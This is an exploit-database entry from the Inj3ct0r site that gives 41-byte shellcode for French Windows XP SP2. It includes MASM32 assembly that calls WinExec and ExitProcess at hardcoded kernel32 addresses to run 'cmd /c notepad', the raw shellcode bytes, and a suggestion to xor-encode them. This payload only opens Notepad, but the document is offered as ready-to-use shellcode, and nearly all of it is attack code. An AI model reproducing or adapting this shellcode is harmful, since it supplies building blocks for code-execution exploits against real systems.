======================================== windows xp-sp2 (fr) notepad.exe 41 bytes ======================================== 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 0 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1 #[+] Discovered By : Inj3ct0r #[+] Site : Inj3ct0r.com #[+] Support e-mail : submit[at]inj3ct0r.com #[+] Visit : inj3ct0r.com , inj3ct0r.org , inj3ct0r.net windows xp-sp2 (fr) notepad.exe 41 bytes author opt!x hacker ######################################################" in this shellcode I use 2 API finded in kernel32.dll:in windows XP SP2 (fr): WinExec: 0x7C8615B5 ExitProcess : 0x7C81CA82 ######################################################" here is assembly code using MASM32: ##################################################" .386 .model flat, stdcall option casemap:none include windows.inc .data .code code: xor edx, edx mov edx, 7C8615B5h call edx xor edx, edx mov edx, 7C81CA82h data: call code db 'cmd /c notepad' end data ##############################################################" and this is the shellcode you have just to encode it with xor an encoder,but it's working with me without encoding : "\xE9\x10\x00\x00\x00\x31\xD2\xBA\xB5\x15\x86\x7C\xFF\xD2\x31\xD2\xBA\x82\x CA\x81\x7C\xE8\xEB\xFF\xFF\xFF\x63\x6D\x64\x20\x2F\x63\x20\x6E\x6F\x74\x65\ x70\x61\x64\x00" --------------------------------- ThE End =] Visit my proj3ct : http://inj3ct0r.com http://inj3ct0r.org http://inj3ct0r.net # ~ - [ [ : Inj3ct0r : ] ]